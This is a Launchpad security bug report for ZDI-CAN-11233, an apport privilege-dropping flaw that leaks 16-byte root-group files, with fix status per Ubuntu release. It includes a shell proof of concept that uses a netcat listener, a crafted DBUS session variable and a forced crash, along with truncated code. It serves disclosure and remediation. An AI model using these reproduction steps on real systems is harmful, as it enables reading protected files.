[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Apport |
Fix Released
|
Medium
|
Unassigned | ||
apport (Ubuntu) |
Fix Released
|
Medium
|
Unassigned | ||
Xenial |
Fix Released
|
Medium
|
Unassigned | ||
Bionic |
Fix Released
|
Medium
|
Unassigned | ||
Eoan |
Won't Fix
|
Medium
|
Unassigned | ||
Focal |
Fix Released
|
Medium
|
Unassigned |
Bug Description
-- VULNERABILITY DETAILS -------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-
* Platform tested:-
---
### Analysis
Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.
It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes.
reproduce step
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHER
zdi@ubuntu:/tmp$
```
~~~C++
orig_uid = os.geteuid()
os.
try:
gdbus = subprocess.
(out, err) = gdbus.communicate()
if err:
except OSError as e:
return False
finally:
~~~
-- CREDIT -------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative
Related branches
CVE References
description: | updated |
information type: | Private Security → Public Security |
Changed in apport (Ubuntu Eoan): | |
status: | Confirmed → Won't Fix |
Changed in apport: | |
status: | New → Fix Released |
milestone: | none → 2.21.0 |
importance: | Undecided → Medium |
Reproduced on focal. Setting the priority to medium due to the requirement that the root group file to be targeted must be exactly 16 bytes in size.